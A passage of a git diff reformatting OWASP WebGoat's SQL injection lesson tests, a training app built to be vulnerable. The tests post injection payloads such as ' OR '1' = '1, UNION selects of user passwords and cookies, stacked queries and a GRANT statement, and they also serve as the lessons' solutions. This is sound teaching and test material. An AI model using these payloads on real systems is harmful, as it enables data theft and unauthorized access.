-    }
+  @AfterEach
+  public void removeGrant() throws SQLException {
+    dataSource
+        .getConnection()
+        .prepareStatement("revoke select on grant_rights from unauthorized_user cascade")
+        .execute();
+  }
 
-    @Test
-    public void grantSolution() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack5")
+  @Test
+  public void grantSolution() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjection/attack5")
                 .param("query", "grant select on grant_rights to unauthorized_user"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+  }
 
-    @Test
-    public void differentTableShouldNotSolveIt() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack5")
+  @Test
+  public void differentTableShouldNotSolveIt() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjection/attack5")
                 .param("query", "grant select on users to unauthorized_user"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 
-    @Test
-    public void noGrantShouldNotSolveIt() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack5")
+  @Test
+  public void noGrantShouldNotSolveIt() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjection/attack5")
                 .param("query", "select * from grant_rights"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5aTest.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5aTest.java
index b08c7c142..db48b6643 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5aTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5aTest.java
@@ -22,66 +22,78 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
-import org.junit.jupiter.api.Disabled;
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-
 import static org.hamcrest.CoreMatchers.containsString;
 import static org.hamcrest.CoreMatchers.is;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import org.junit.jupiter.api.Disabled;
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+
 public class SqlInjectionLesson5aTest extends SqlLessonTest {
 
-    @Test
-    public void knownAccountShouldDisplayData() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/assignment5a")
+  @Test
+  public void knownAccountShouldDisplayData() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjection/assignment5a")
                 .param("account", "Smith")
                 .param("operator", "")
                 .param("injection", ""))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("lessonCompleted", is(false)))
-                .andExpect(jsonPath("$.feedback", is(messages.getMessage("assignment.not.solved"))))
-                .andExpect(jsonPath("$.output", containsString("<p>USERID, FIRST_NAME")));
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("lessonCompleted", is(false)))
+        .andExpect(jsonPath("$.feedback", is(messages.getMessage("assignment.not.solved"))))
+        .andExpect(jsonPath("$.output", containsString("<p>USERID, FIRST_NAME")));
+  }
 
-    @Disabled
-    @Test
-    public void unknownAccount() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/assignment5a")
+  @Disabled
+  @Test
+  public void unknownAccount() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjection/assignment5a")
                 .param("account", "Smith")
-                .param("operator", "").param("injection", ""))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("lessonCompleted", is(false)))
-                .andExpect(jsonPath("$.feedback", is(messages.getMessage("NoResultsMatched"))))
-                .andExpect(jsonPath("$.output").doesNotExist());
-    }
+                .param("operator", "")
+                .param("injection", ""))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("lessonCompleted", is(false)))
+        .andExpect(jsonPath("$.feedback", is(messages.getMessage("NoResultsMatched"))))
+        .andExpect(jsonPath("$.output").doesNotExist());
+  }
 
-    @Test
-    public void sqlInjection() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/assignment5a")
+  @Test
+  public void sqlInjection() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjection/assignment5a")
                 .param("account", "'")
                 .param("operator", "OR")
                 .param("injection", "'1' = '1"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("lessonCompleted", is(true)))
-                .andExpect(jsonPath("$.feedback", containsString("You have succeed")))
-                .andExpect(jsonPath("$.output").exists());
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("lessonCompleted", is(true)))
+        .andExpect(jsonPath("$.feedback", containsString("You have succeed")))
+        .andExpect(jsonPath("$.output").exists());
+  }
 
-    @Test
-    public void sqlInjectionWrongShouldDisplayError() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/assignment5a")
+  @Test
+  public void sqlInjectionWrongShouldDisplayError() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjection/assignment5a")
                 .param("account", "Smith'")
                 .param("operator", "OR")
                 .param("injection", "'1' = '1'"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("lessonCompleted", is(false)))
-                .andExpect(jsonPath("$.feedback", containsString(messages.getMessage("assignment.not.solved"))))
-                .andExpect(jsonPath("$.output", is("malformed string: '1''<br> Your query was: SELECT * FROM user_data WHERE" +
-                        " first_name = 'John' and last_name = 'Smith' OR '1' = '1''")));
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("lessonCompleted", is(false)))
+        .andExpect(
+            jsonPath("$.feedback", containsString(messages.getMessage("assignment.not.solved"))))
+        .andExpect(
+            jsonPath(
+                "$.output",
+                is(
+                    "malformed string: '1''<br> Your query was: SELECT * FROM user_data WHERE"
+                        + " first_name = 'John' and last_name = 'Smith' OR '1' = '1''")));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson6aTest.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson6aTest.java
index a9020ee7f..4ca0469b8 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson6aTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson6aTest.java
@@ -22,72 +22,89 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
-import org.junit.jupiter.api.Test;
-import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-
 import static org.hamcrest.Matchers.containsString;
 import static org.hamcrest.Matchers.is;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+
 public class SqlInjectionLesson6aTest extends SqlLessonTest {
 
-    @Test
-    public void wrongSolution() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjectionAdvanced/attack6a")
+  @Test
+  public void wrongSolution() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjectionAdvanced/attack6a")
                 .param("userid_6a", "John"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(false)));
+  }
 
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", is(false)));
-    }
+  @Test
+  public void wrongNumberOfColumns() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjectionAdvanced/attack6a")
+                .param(
+                    "userid_6a",
+                    "Smith' union select userid,user_name, password,cookie from user_system_data"
+                        + " --"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(false)))
+        .andExpect(
+            jsonPath(
+                "$.output",
+                containsString(
+                    "column number mismatch detected in rows of UNION, INTERSECT, EXCEPT, or VALUES"
+                        + " operation")));
+  }
 
-    @Test
-    public void wrongNumberOfColumns() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjectionAdvanced/attack6a")
-                .param("userid_6a", "Smith' union select userid,user_name, password,cookie from user_system_data --"))
+  @Test
+  public void wrongDataTypeOfColumns() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjectionAdvanced/attack6a")
+                .param(
+                    "userid_6a",
+                    "Smith' union select 1,password, 1,'2','3', '4',1 from user_system_data --"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(false)))
+        .andExpect(jsonPath("$.output", containsString("incompatible data types in combination")));
+  }
 
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", is(false)))
-                .andExpect(jsonPath("$.output", containsString("column number mismatch detected in rows of UNION, INTERSECT, EXCEPT, or VALUES operation")));
-    }
-
-    @Test
-    public void wrongDataTypeOfColumns() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjectionAdvanced/attack6a")
-                .param("userid_6a", "Smith' union select 1,password, 1,'2','3', '4',1 from user_system_data --"))
-
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", is(false)))
-                .andExpect(jsonPath("$.output", containsString("incompatible data types in combination")));
-    }
-
-    @Test
-    public void correctSolution() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjectionAdvanced/attack6a")
+  @Test
+  public void correctSolution() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjectionAdvanced/attack6a")
                 .param("userid_6a", "Smith'; SELECT * from user_system_data; --"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", is(true)))
-                .andExpect(jsonPath("$.feedback", containsString("passW0rD")));
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(true)))
+        .andExpect(jsonPath("$.feedback", containsString("passW0rD")));
+  }
 
-    @Test
-    public void noResultsReturned() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjectionAdvanced/attack6a")
+  @Test
+  public void noResultsReturned() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjectionAdvanced/attack6a")
                 .param("userid_6a", "Smith' and 1 = 2 --"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(false)))
+        .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.6a.no.results"))));
+  }
 
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", is(false)))
-                .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.6a.no.results"))));
-    }
-
-    @Test
-    public void noUnionUsed() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjectionAdvanced/attack6a")
+  @Test
+  public void noUnionUsed() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjectionAdvanced/attack6a")
                 .param("userid_6a", "S'; Select * from user_system_data; --"))
-
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", is(true)))
-                .andExpect(jsonPath("$.feedback", containsString("UNION")));
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(true)))
+        .andExpect(jsonPath("$.feedback", containsString("UNION")));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson6bTest.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson6bTest.java
index 043bc2e23..6bb702178 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson6bTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson6bTest.java
@@ -22,32 +22,33 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-
 import static org.hamcrest.Matchers.is;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+
 public class SqlInjectionLesson6bTest extends SqlLessonTest {
 
-    @Test
-    public void submitCorrectPassword() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjectionAdvanced/attack6b")
+  @Test
+  public void submitCorrectPassword() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjectionAdvanced/attack6b")
                 .param("userid_6b", "passW0rD"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(true)));
+  }
 
-                .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(true)));
-    }
-
-    @Test
-    public void submitWrongPassword() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjectionAdvanced/attack6b")
+  @Test
+  public void submitWrongPassword() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjectionAdvanced/attack6b")
                 .param("userid_6b", "John"))
-
-                .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(false)));
-    }
-
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", is(false)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson8Test.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson8Test.java
index f53768e34..8ab7e242e 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson8Test.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson8Test.java
@@ -22,79 +22,86 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-
 import static org.hamcrest.CoreMatchers.containsString;
 import static org.hamcrest.CoreMatchers.is;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+
 /**
  * @author Benedikt Stuhrmann
  * @since 11/07/18.
  */
 public class SqlInjectionLesson8Test extends SqlLessonTest {
 
-    @Test
-    public void oneAccount() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack8")
+  @Test
+  public void oneAccount() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjection/attack8")
                 .param("name", "Smith")
                 .param("auth_tan", "3SL99A"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("lessonCompleted", is(false)))
+        .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.8.one"))))
+        .andExpect(jsonPath("$.output", containsString("<table><tr><th>")));
+  }
 
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("lessonCompleted", is(false)))
-                .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.8.one"))))
-                .andExpect(jsonPath("$.output", containsString("<table><tr><th>")));
-    }
-
-    @Test
-    public void multipleAccounts() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack8")
+  @Test
+  public void multipleAccounts() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjection/attack8")
                 .param("name", "Smith")
                 .param("auth_tan", "3SL99A' OR '1' = '1"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("lessonCompleted", is(true)))
+        .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.8.success"))))
+        .andExpect(
+            jsonPath(
+                "$.output",
+                containsString(
+                    "<tr><td>96134<\\/td><td>Bob<\\/td><td>Franco<\\/td><td>Marketing<\\/td><td>83700<\\/td><td>LO9S2V<\\/td><\\/tr>")));
+  }
 
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("lessonCompleted", is(true)))
-                .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.8.success"))))
-                .andExpect(jsonPath("$.output", containsString("<tr><td>96134<\\/td><td>Bob<\\/td><td>Franco<\\/td><td>Marketing<\\/td><td>83700<\\/td><td>LO9S2V<\\/td><\\/tr>")));
-    }
-
-    @Test
-    public void wrongNameReturnsNoAccounts() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack8")
+  @Test
+  public void wrongNameReturnsNoAccounts() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjection/attack8")
                 .param("name", "Smithh")
                 .param("auth_tan", "3SL99A"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("lessonCompleted", is(false)))
+        .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.8.no.results"))))
+        .andExpect(jsonPath("$.output").doesNotExist());
+  }
 
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("lessonCompleted", is(false)))
-                .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.8.no.results"))))
-                .andExpect(jsonPath("$.output").doesNotExist());
-    }
-
-    @Test
-    public void wrongTANReturnsNoAccounts() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack8")
+  @Test
+  public void wrongTANReturnsNoAccounts() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjection/attack8")
                 .param("name", "Smithh")
                 .param("auth_tan", ""))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("lessonCompleted", is(false)))
+        .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.8.no.results"))))
+        .andExpect(jsonPath("$.output").doesNotExist());
+  }
 
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("lessonCompleted", is(false)))
-                .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.8.no.results"))))
-                .andExpect(jsonPath("$.output").doesNotExist());
-    }
-
-    @Test
-    public void malformedQueryReturnsError() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack8")
+  @Test
+  public void malformedQueryReturnsError() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/SqlInjection/attack8")
                 .param("name", "Smith")
                 .param("auth_tan", "3SL99A' OR '1' = '1'"))
-
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("lessonCompleted", is(false)))
-                .andExpect(jsonPath("$.output", containsString("feedback-negative")));
-    }
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("lessonCompleted", is(false)))
+        .andExpect(jsonPath("$.output", containsString("feedback-negative")));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson9Test.java b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson9Test.java
index baf3c9746..4cd0c368f 100644
--- a/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson9Test.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson9Test.java
@@ -22,158 +22,177 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-
 import static org.hamcrest.CoreMatchers.containsString;
 import static org.hamcrest.CoreMatchers.is;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.lessons.sqlinjection.SqlLessonTest;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+
 /**
  * @author Benedikt Stuhrmann
  * @since 11/07/18.
  */
 public class SqlInjectionLesson9Test extends SqlLessonTest {
 
-    private String completedError = "JSON path \"lessonCompleted\"";
+  private String completedError = "JSON path \"lessonCompleted\"";
 
-    @Test
-    public void oneAccount() throws Exception {
-        try {
-            mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack9")
-                    .param("name", "Smith")
-                    .param("auth_tan", "3SL99A"))
+  @Test
+  public void oneAccount() throws Exception {
+    try {
+      mockMvc
+          .perform(
+              MockMvcRequestBuilders.post("/SqlInjection/attack9")
+                  .param("name", "Smith")
+                  .param("auth_tan", "3SL99A"))
+          .andExpect(status().isOk())
+          .andExpect(jsonPath("lessonCompleted", is(false)))
+          .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.9.one"))))
+          .andExpect(jsonPath("$.output", containsString("<table><tr><th>")));
+    } catch (AssertionError e) {
+      if (!e.getMessage().contains(completedError)) throw e;
 
-                    .andExpect(status().isOk())
-                    .andExpect(jsonPath("lessonCompleted", is(false)))
-                    .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.9.one"))))
-                    .andExpect(jsonPath("$.output", containsString("<table><tr><th>")));
-        } catch (AssertionError e) {
-            if (!e.getMessage().contains(completedError)) throw e;
-
-            mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack9")
-                    .param("name", "Smith")
-                    .param("auth_tan", "3SL99A"))
-
-                    .andExpect(status().isOk())
-                    .andExpect(jsonPath("lessonCompleted", is(true)))
-                    .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.9.success"))))
-                    .andExpect(jsonPath("$.output", containsString("<table><tr><th>")));
-        }
+      mockMvc
+          .perform(
+              MockMvcRequestBuilders.post("/SqlInjection/attack9")
+                  .param("name", "Smith")
+                  .param("auth_tan", "3SL99A"))
+          .andExpect(status().isOk())
+          .andExpect(jsonPath("lessonCompleted", is(true)))
+          .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.9.success"))))
+          .andExpect(jsonPath("$.output", containsString("<table><tr><th>")));
     }
+  }
 
-    @Test
-    public void multipleAccounts() throws Exception {
-        try {
-            mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack9")
-                    .param("name", "Smith")
-                    .param("auth_tan", "3SL99A' OR '1' = '1"))
+  @Test
+  public void multipleAccounts() throws Exception {
+    try {
+      mockMvc
+          .perform(
+              MockMvcRequestBuilders.post("/SqlInjection/attack9")
+                  .param("name", "Smith")
+                  .param("auth_tan", "3SL99A' OR '1' = '1"))
+          .andExpect(status().isOk())
+          .andExpect(jsonPath("lessonCompleted", is(false)))
+          .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.9.one"))))
+          .andExpect(
+              jsonPath(
+                  "$.output",
+                  containsString(
+                      "<tr><td>96134<\\/td><td>Bob<\\/td><td>Franco<\\/td><td>Marketing<\\/td><td>83700<\\/td><td>LO9S2V<\\/td><\\/tr>")));
+    } catch (AssertionError e) {
+      if (!e.getMessage().contains(completedError)) throw e;
 
-                    .andExpect(status().isOk())
-                    .andExpect(jsonPath("lessonCompleted", is(false)))
-                    .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.9.one"))))
-                    .andExpect(jsonPath("$.output", containsString("<tr><td>96134<\\/td><td>Bob<\\/td><td>Franco<\\/td><td>Marketing<\\/td><td>83700<\\/td><td>LO9S2V<\\/td><\\/tr>")));
-        } catch (AssertionError e) {
-            if (!e.getMessage().contains(completedError)) throw e;
-
-            mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack9")
-                    .param("name", "Smith")
-                    .param("auth_tan", "3SL99A' OR '1' = '1"))
-
-                    .andExpect(status().isOk())
-                    .andExpect(jsonPath("lessonCompleted", is(true)))
-                    .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.9.success"))))
-                    .andExpect(jsonPath("$.output", containsString("<tr><td>96134<\\/td><td>Bob<\\/td><td>Franco<\\/td><td>Marketing<\\/td><td>83700<\\/td><td>LO9S2V<\\/td><\\/tr>")));
-        }
+      mockMvc
+          .perform(
+              MockMvcRequestBuilders.post("/SqlInjection/attack9")
+                  .param("name", "Smith")
+                  .param("auth_tan", "3SL99A' OR '1' = '1"))
+          .andExpect(status().isOk())
+          .andExpect(jsonPath("lessonCompleted", is(true)))
+          .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.9.success"))))
+          .andExpect(
+              jsonPath(
+                  "$.output",
+                  containsString(
+                      "<tr><td>96134<\\/td><td>Bob<\\/td><td>Franco<\\/td><td>Marketing<\\/td><td>83700<\\/td><td>LO9S2V<\\/td><\\/tr>")));
     }
+  }
 
-    @Test
-    public void wrongNameReturnsNoAccounts() throws Exception {
-        try {
-            mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack9")
-                    .param("name", "Smithh")
-                    .param("auth_tan", "3SL99A"))
+  @Test
+  public void wrongNameReturnsNoAccounts() throws Exception {
+    try {
+      mockMvc
+          .perform(
+              MockMvcRequestBuilders.post("/SqlInjection/attack9")
+                  .param("name", "Smithh")
+                  .param("auth_tan", "3SL99A"))
+          .andExpect(status().isOk())
+          .andExpect(jsonPath("lessonCompleted", is(false)))
+          .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.8.no.results"))))
+          .andExpect(jsonPath("$.output").doesNotExist());
+    } catch (AssertionError e) {
+      if (!e.getMessage().contains(completedError)) throw e;
 
-                    .andExpect(status().isOk())
-                    .andExpect(jsonPath("lessonCompleted", is(false)))
-                    .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.8.no.results"))))
-                    .andExpect(jsonPath("$.output").doesNotExist());
-        } catch (AssertionError e) {
-            if (!e.getMessage().contains(completedError)) throw e;
-
-            mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack9")
-                    .param("name", "Smithh")
-                    .param("auth_tan", "3SL99A"))
-
-                    .andExpect(status().isOk())
-                    .andExpect(jsonPath("lessonCompleted", is(true)))
-                    .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.8.no.success"))))
-                    .andExpect(jsonPath("$.output").doesNotExist());
-        }
+      mockMvc
+          .perform(
+              MockMvcRequestBuilders.post("/SqlInjection/attack9")
+                  .param("name", "Smithh")
+                  .param("auth_tan", "3SL99A"))
+          .andExpect(status().isOk())
+          .andExpect(jsonPath("lessonCompleted", is(true)))
+          .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.8.no.success"))))
+          .andExpect(jsonPath("$.output").doesNotExist());
     }
+  }
 
-    @Test
-    public void wrongTANReturnsNoAccounts() throws Exception {
-        try {
-            mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack9")
-                    .param("name", "Smithh")
-                    .param("auth_tan", ""))
+  @Test
+  public void wrongTANReturnsNoAccounts() throws Exception {
+    try {
+      mockMvc
+          .perform(
+              MockMvcRequestBuilders.post("/SqlInjection/attack9")
+                  .param("name", "Smithh")
+                  .param("auth_tan", ""))
+          .andExpect(status().isOk())
+          .andExpect(jsonPath("lessonCompleted", is(false)))
+          .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.8.no.results"))))
+          .andExpect(jsonPath("$.output").doesNotExist());
+    } catch (AssertionError e) {
+      if (!e.getMessage().contains(completedError)) throw e;
 
-                    .andExpect(status().isOk())
-                    .andExpect(jsonPath("lessonCompleted", is(false)))
-                    .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.8.no.results"))))
-                    .andExpect(jsonPath("$.output").doesNotExist());
-        } catch (AssertionError e) {
-            if (!e.getMessage().contains(completedError)) throw e;
-
-            mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack9")
-                    .param("name", "Smithh")
-                    .param("auth_tan", ""))
-
-                    .andExpect(status().isOk())
-                    .andExpect(jsonPath("lessonCompleted", is(true)))
